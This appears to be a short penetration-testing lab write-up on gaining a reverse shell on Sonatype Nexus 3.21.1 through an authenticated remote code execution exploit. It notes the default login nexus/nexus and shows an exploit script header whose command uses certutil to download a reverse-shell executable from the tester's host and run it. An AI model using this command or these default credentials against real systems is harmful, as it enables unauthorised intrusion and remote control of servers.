Exploitation

Sonatype Nexus 3.21.1 - Remote Code Execution (Authenticated)Exploit Database

With authentication I was able to figure out the password for the login page of the sonatype nexus repo manager. The user was nexus and so was the password.

#!/usr/bin/python3

import sys
import base64
import requests

URL='http://192.168.143.61:8081'
CMD='cmd.exe /c certutil -urlcache -f http://192.168.49.143:80/lyethar-shell-reverse.exe lyethar-shell-reverse.exe && lyethar-shell-reverse.exe'
USERNAME='nexus'
PASSWORD='nexus'

With a little modification I generated a my payload and made the exploit reach out to me and ultimately get a reverse shell.